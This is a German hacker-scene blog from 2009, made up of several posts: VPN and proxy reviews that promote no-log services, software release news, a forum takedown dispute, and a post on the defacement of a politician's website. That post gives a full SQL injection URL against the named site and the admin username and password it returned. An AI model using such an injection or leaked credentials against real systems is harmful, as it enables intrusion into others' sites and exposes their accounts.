Category: Szene News

Nachdem ich zu SceneVPN/Proxy schon einen Erfahrungsbericht geschrieben hatte, wollte ich einen weiteren VPN Dienst testen und meine Erfahrungen damit, euch mitteilen.

Wie unschwer zu erkennen, werd ich den VPN Dienst von CINIPAC testen (dort hostet mein Blog uebrigens) – diese Ehre hatte ich schon damals 2008, als ich noch in der “Universalcrew” taetig war (hatte mir nen Acc fuer 1 oder 2 Monate gekauft). 🙂

Der Team CINIPAC VPN basiert auf OpenVPN, was ich super finde, sowohl fuer Linux- (bin Ubuntu User 😉 ), als auch Windows- User.

CINIPAC bietet normal 3 Laender zur Auswahl, USA, Malaysia & Niederlande. Uebersicht ueber die Preise findet ihr hier:

oder eben auch auf cinipac.com und/oder cinipac-hosting.org.

Hier noch eine kleine Info zum VPN:

VPN USA (45 Available) – On all our servers we operate OpenVPN, and some of them have no traffic restrictions. All are configured to use 1024 bit public key encryption for the key exchange and use AES-256 bit as symmetric algorithm for the protection of the data, currently, as far as we know, the safest configuration offered on the Internet.
The advantage of OpenVPN is that once you have established a connection to our OpenVPN server, all your Internet traffic is automatically routed through it. Regardless whether you browse, send or receive emails, chat or use any other application or protocol, it is automatically encrypted and routed through the server; the IP of the OpenVPN server is equally automatically assigned to your machine. It is not necessary to configure or set up any application specifically for it.

Fuer mehr Informationen bezueglich dem VPN, wird euch der Support von CINIPAC sicherlich weiterhelfen 😉

Nun zum VPN (hab den USA VPN getestet):

Einrichtung: Die Einrichtung verlief sowohl auf Linux, als auch auf Windows schnell und problemlos. Pfad in der Config angepasst, in die Richtigen ordner verschoben, VPN gestartet und es hat selbstverstaendlich geklappt 😉 (Biete auch Support an, falls jemand nicht mit OpenVPN vertraut ist^^)

Speed: Hab nen paar Speedtests durchgefuehrt und bin mit der Geschwindigkeit zufrieden. Schwangt zwischen ~ DSL 3k (wenn weniger los ist) und DSL 1k (gegen Abends – peak zeiten). Der Seitenaufbau ist jedoch schnell genug, so das man kaum Geschwindigkeitseinbusen davon traegt. Nur zum DL ist es nicht geeignet (btw. zum Download (von Rapidshare oder so) ist normal gar kein VPN/Proxy geeignet, weil das nur paranoid ist).

Anonymität: Aufgrund dessen, dass sich Team CINIPAC nicht zum Loggen verpflichtet fuehlt, wird dort nichts geloggt. Aussagen von Cinipac selbst:

(12:15:20 AM) cinipac: wir loggen nichts. wir halten das da wie PP 😉
(12:15:48 AM) cinipac: wozu auch – es gibt niemanden der uns dazu zwingen kann

Ist meiner Meinung nach daher ebenfalls ein sehr sicherer Anonymisierungdienst.

Support: Kenne Team CINIPAC seit gut 1 Jahr (und nen paar Monate) und konnte den Support daher mehrmals testen^^ War bisher immer hilfreich, schnell und zuverlaessig. Gibt daher eigentlich nichts worueber man meckern koennte, was den VPN betrifft.

Verfuegbarkeit: 99,9% 😛

Joa, das war soweit mein kleiner Erfahrungsbericht zum Team CINIPAC VPN. Da es Team CINIPAC auch schon laenger gibt, haben sie denk ich auch einiges an Erfahrungen gesammelt und sind daher vergleichbar auf einer Wellenlaenge mit anderen VPN Diensten. Mein springender Punkt war, wie gesagt, die OpenVPN Unterstuetzung und das der Preis fuer einen sicheren VPN um einiges billiger ist, als bei Perfect-Privacy.

Heyho!

wird mal wieder Zeit etwas zu bloggen. Auf vielen Blogs lese ich, dass “neue Ideen” und Vorschlaege fehlen… geht mir fast genauso – daher Zeit fuer eine kleine “Wochenuebersicht” was so passiert ist.

1) Am 17.10.2009 wurde anscheiend die bekannte Seite hackhound.org defaced. Wie das ganze aussah, seht ihr hier:

2) SceneProxy hat seinen “Besitzer gewechselt”, fuer Kunden bleibt alles beim Alten. Da gibts nochn interessanten Artikel:

http://www.stern.de/politik/deutschland/hackerangriffe-auf-cdu-politiker-schaeubles-fingierte-ruecktrittserklaerung-1513707.html

Der Täter habe dabei über ein Tunnelverfahren zugegriffen: “Die IP-Adresse, zu der wir es zurückverfolgen konnten, lag auf einem russischen Auslandsserver.” Den Täter über sceneproxy.org weiter zu verfolgen sei “letztlich nicht möglich”.

Wenn das keine Werbung ist 😀

3) Am 21. Oktober 2009 erschien eine neue TrueCrypt Version, was dort neu ist seht ihr hier:

6.3

October 21, 2009

New features:

*

Full support for Windows 7.
*

Full support for Mac OS X 10.6 Snow Leopard.
*

The ability to configure selected volumes as ‘system favorite volumes’. This is useful, for example, when you have volumes that need to be mounted before system and application services start and before users start logging on. It is also useful when there are network-shared folders located on a TrueCrypt volume and you need to ensure that the network shares will be restored by the system each time it is restarted. For more information, see the chapter ‘Main Program Window’, section ‘Program Menu’, subsection ‘Volumes -> Save Currently Mounted Volumes as System Favorites’ in the documentation. (Windows)

Improvements and bug fixes:

*

‘Favorite’ volumes residing within partitions or dynamic volumes will no longer be affected by changes in disk device numbers, which may occur, e.g., when a drive is removed or added. Note: If you use a favorite volume list saved by TrueCrypt 6.2a or earlier and you want to take advantage of this improvement, you need to resave the list using TrueCrypt 6.3. (Windows)
*

Many other minor improvements and bug fixes. (Windows, Mac OS X, and Linux)

Was mir vorallem unter Ubuntu/Linux aufgefallen ist, war das TrueCrypt damals unter “Others” gelistet war und nun in “Accessories” steckt. Und auf Win 7 RC kann man TrueCrypt 6.3 gar nicht installieren, da erscheint ne Fehlermeldung das nur die final unterstuetzt wird. Auf Win 7 Ultimate x64 hab ich damit keine probs.

Quelle, Infos, Downloads und mehr, hier: http://www.truecrypt.org/

4) TeamSpeak 3
Seit dem 26. Oktober steht auf der offiziellen TeamSpeak Homepage das genaue
Datum der ersten oeffentlichen TeamSpeak ³ Beta Version.

So heißt es:

We are pleased to announce OPEN BETA TESTING of the TeamSpeak 3 client and server will commence:

* SATURDAY DEC 19th, 2009
* 13:37 CET (Central European Time)
* 07:37 EST (Eastern Standard Time)

Both the TeamSpeak 3 Client and Server will be available for download and testing on the following platforms:

* Windows (32bit and 64bit)
* Mac OS X (Intel and PPC)
* Linux (32bit and 64bit)

We have received numerous queries regarding whether TeamSpeak 3 will be compatible with Windows 7 and Windows Server 2008 and in short, both client and server WILL be compatible with these operating systems.

On this date, we expect to approve at least several large Authorized TeamSpeak Host Providers (ATHPs) so users will also have the ability to rent a professionally hosted TeamSpeak 3 server. In addition, we will be offering a limited number of slots/connections available on our TeamSpeak 3 public test servers. However, if you are technically savvy enough to host your own server you will of course also have the opportunity to do so.

Existing TeamSpeak 2 ATHPs will be contacted in the coming weeks with further details on how to become a TeamSpeak 3 ATHP. Established hosting companies who are not currently offering TeamSpeak hosting will also have the opportunity to apply to become a TeamSpeak 3 ATHP ahead of time as well. We will also be coordinating from among our top, established TeamSpeak 2 ATHPs in good standing, the release of the TeamSpeak 3 server PRIOR to the open beta date above to allow time for testing, writing provisioning scripts, planning migrations, etc.

As usual, stay tuned to our site for updates and details!

http://teamspeak.com/?page=newsarchive&ident=20091027

Na das ist mal ne Uhrzeit 😀 Erstmal 5 Jahre die User warten lassen und dann so ne Uhrzeit waehlen. Wie man sieht ist ab dem Datum dann die Client und Server Version frei und oeffentlich erhaeltlich.

Ich hoff, dass sie wenigsten bei TS³ sich etwas mehr Muehe fuer den Linux Client gegeben haben, da diese bei einigen Usern nicht so gut funktioniert (hab ich zumindest so mitbekommen).

5) Joa, der letzte Punkt. “Kellerkind” welcher schonmal bei mir bloggen durfte (vielleicht erinnert sich der ein oder andere noch dran), was teilweise nicht so gut ankam, hat nun nen eigenen Blog:

http://www.moron.ws/

Wuensch ihm viel Glueck & Spaß bei seinem Webblog. 🙂

So das wars auch soweit von mir vorerst, meinen Artikel abschließen werd ich mit einem Hinweis, naemlich das morgen Ubuntu 9.10 released wird. 🙂

Nachdem ich SceneProxy schon einmal testen durfte (*klick*), hab ich von Floo einen 3-taegigen Testaccount erhalten. Meine Erfahrungen mit SceneVPN (Scenevpn.org & Sceneproxy.org sind das gleiche, Sceneproxy bietet nur seit neustem einen VPN Dienst an) werd ich euch hier mitteilen 😀

Dort hat sich seit meinem letzten Besuch einiges geaendert, Produkte muss man nun nicht mehr dort am Support bestellen, sondern quasi ohne Supporter kaufen, (Menschen werden durch Maschinen ersetzt, Arbeitslosenzahlen steigen, tzz) sehr bequem das ganze 😀

Zuerst koennts euch nen Account anlegen, das geht einfach und schnell hier: http://www.sceneproxy.org/?l=login – Dann legt euch nen acc an, Username, 2x PW & email, danach koennts euch direkt einloggen, im schlichten User CP koennts dann unter “Cash-In” eure PSCs einzahlen, Unter “Kaufen” koennt ihr zuerst auswaehlen ob ihr 1,3,6,12 Monate den Proxy und/oder VPN behalten wollt, dann welchen Server ihr haben wollt, die Preise stehen (inklusive deren Rabatte) sofort da und mit einem Klick auf kaufen, koennt ihr dann eure Ware joa kaufen ^^ Mehr dazu auch in der FAQ. (Mich wuerd interessieren, wie lang es dieses System schon gibt :D)

Nun zum VPN selber:

Einrichung: Das Einrichten ging problemlos und schnell, einfach ne neue Verbindung erstellen wie wenn man sich nen VPN von SwissVPN, Relakks,.. einrichten moechte.

Speed: Der Speed vom VPN war damals relativ schnell, ich glaub sogar vergleichbar mit einer 6k Leitung. Kommt aber auch je nach dem auf die Auslastung der Leitungen an.

Anonymität: Aufgrund dessen, dass nichts geloggt wird, ist SceneProxy/VPN einer der sichersten Anonymisierungsdienste der “Scene” meiner Meinung nach, und das kann man als sehr positiven Punkt sehen. Vorallem durch VPN + SSH Proxy kann eine maximale Anonymisierung gewaehrleistet werden, dass erkennt man auch gut an dieser Zeichnung:

Support: Hab ich zwar nicht getestet, da ich keinen Support benoetige, aber ich denk dieser wird wie immer Nett & Hilfreich sein 😉

Verfuegbarkeit: 99,9 % 😛

Joa, soweit meine Meinung zu SceneProxy/VPN, ich find das ist ein wirklich empfehlenswerter Anonymisierungsdienst und in den letzten Monaten haben sie einiges an Erfahrungen gesammelt und sind dadurch besser als andere Dienste geworden.

Startseite von SceneCoderZ.cc:

SceneCoderZ – Offline

tmh (themasterhacker) hat es geschafft… SceneCoderZ ist offline!

Er hat sich einen SMOD Account ergattert, unseren Teamproxy Public gemacht, mit diesem wurden dann 15 Server auf unseren Namen gefaked. Daraufhin hat unser Hoster alle unsere Server abgeschaltet. Heute hat er zum Abschluss die Handynummern der Teammitglieder im IRC publik gemacht. Vielen Dank – Du machst die Szene besser!

Freu dich nicht zu früh, du hast dir nicht nur mich zum Feind gemacht!

Wann unser Hoster den Server wieder frei gibt steht in den Sternen.

MfG das Team

Quelle: http://scenecoderz.cc/

Und auch -tmh- hat vor seinen Kartoffel-Hack Blog (und das ganze Projekt?) einzustellen:

[21:37] <%tmh> KH wird eingestellt
[21:37] <%tmh> Hatte ich heut morgen entschieden
[21:37] <%tmh> bzw. neues Layout
[21:37] <+astra> why das 🙁
[21:37] <+astra> aso
[21:37] <%tmh> mom
[21:37] <%tmh> ~~~ KH Project ~~~
[21:37] <%tmh> Pro KH:
[21:37] <%tmh> – Domain bezahlt
[21:37] <%tmh> Contra KH:
[21:37] <%tmh> – Arbeit
[21:37] <%tmh> – Gleiche Fragen <= Damn Kiddys
[21:38] <%tmh> – “Post Zwang”
[21:38] <%tmh> – Legalalität ?
[21:38] <%tmh> – Ab September weniger Zeit
[…]
[21:55] <%tmh> So feddig alles umgestellt
[21:55] <%tmh> den Cheat gibts ja noch zum DL
[21:55] <%tmh> Wahrscheinlich auch noch updates
[21:56] <%tmh> Aber keine Lust mehr aufn ganzen Blog usw.

Aus #creative-coding @ irc.datawhore.net

Die Website vom Martin Schulz “Vorsitzender der Fraktion der Sozialdemokratischen Partei Europas (SPE) im Europäischen Parlament” wurde am 13.07.2009 defaced.

Aufmerksam wurde darauf gemacht mit “Zensursula ICH LIEBE DICH” und dem Zensursula Video http://youtube.com/watch?v=O4vbdusj7Pk

Hier sind screenshots von 9 Eintraegen in “Aktuelles”, eventuell sieht man nun wie l33t einige doch sind 🙂

Nr. 2:

Nr. 3:

Nr. 4:

Nr. 5:

Nr. 6:

Nr. 7:

Nr. 8:

Nr. 9:

Und so lustig wie einige sind, wurde auch noch extra das “Zur Person” geaendert:

Tja.. was soll man dazu noch sagen.

Mich wudert es eher warum die Seite erst jetzt defaced wurde, da die Luecke keine schwer zu findende war.

Die (vollendete) SQL Injection:

http://martin-schulz.info/index.php?link=4&bereich=1&details=1&id=-180+union+select+1,concat_ws(0x3a,benutzername,passwort),3,4,5,6,7,8,9,10,11,12,13+from+user-- f

Ausgegeben wird uns:

visualseven:chang0red

Das heißt jemand war schneller und hat das PW geaendert zu “chang0red”. Mich wunderts nur dass das PW in der MySQL DB plain / unverschluesselt gespeichert wird..

Najo was soll man noch dazu sagen?

Richtig. Hat die Aktion auch nurn bissle was gebracht? Konnte irgendwas erreicht werden in der Politik, außer dass nun andere gegruesst wurden und von einigen Leuten das kindischen Verhalten freien Lauf hatte? Nicht wirklich.